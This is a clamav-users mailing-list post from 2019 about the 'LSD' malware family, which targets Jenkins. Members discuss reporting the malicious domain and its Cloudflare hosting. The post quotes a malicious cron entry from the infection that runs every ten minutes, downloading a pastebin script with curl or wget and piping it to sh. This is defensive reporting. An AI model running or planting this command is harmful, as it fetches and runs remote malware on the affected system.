[clamav-users] LSD Malwares
Xavier Maysonnave
x.maysonnave at gmail.com
Fri Apr 26 03:25:23 UTC 2019
Hi All,
Thanks for your feedback.
I'm going to report to Cloudflare this URL.
However keep in mind that there are other URLs who are involved in this
family.
*/10 * * * * (curl -fsSL https://pastebin.com/raw/wR3ETdbi||wget -q -O-
https://pastebin.com/raw/wR3ETdbi)|sh
This one targets Jenkins, another popular OpenSource tool, not used on our
infrastructure though.
I'm still very interested with the consequences of this malwares. Any hints
will be greatly appreciated.
Thanks.
Light
Pudhuveedu / Xavier
PGP Fingerprint: CAE5 CE4A EFE9 134F D991 5465 081C B6FB 2EAC 6CC9
<http://keyserver.ubuntu.com/pks/lookup?op=get&search=0x081CB6FB2EAC6CC9>
Le ven. 26 avr. 2019 à 08:03, Dave Warren via clamav-users <
clamav-users at lists.clamav.net> a écrit :
> The same applies: Report it. Cloudflare will either forward the
> complaint for you, or block the offending URL (or both).
>
> On 2019-04-25 19:16, Dennis Peterson wrote:
> > That domain is hosted on a cloudflare IP block. They're become part of
> > the problem.
> >
> > dp
> >
> > On 4/25/19 7:52 AM, J.R. via clamav-users wrote:
> >> Perhaps it would also be worthwhile to report dd.heheda.tk to their
> >> hosting provider & domain registrar that they are hosting malware and
> >> get that site shut down...
> >>
>
> _______________________________________________
>
> clamav-users mailing list
> clamav-users at lists.clamav.net
> https://lists.clamav.net/mailman/listinfo/clamav-users
>
>
> Help us build a comprehensive ClamAV guide:
> https://github.com/vrtadmin/clamav-faq
>
> http://www.clamav.net/contact.html#ml
>
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://lists.clamav.net/pipermail/clamav-users/attachments/20190426/d3d45aee/attachment.htm>
More information about the clamav-users
mailing list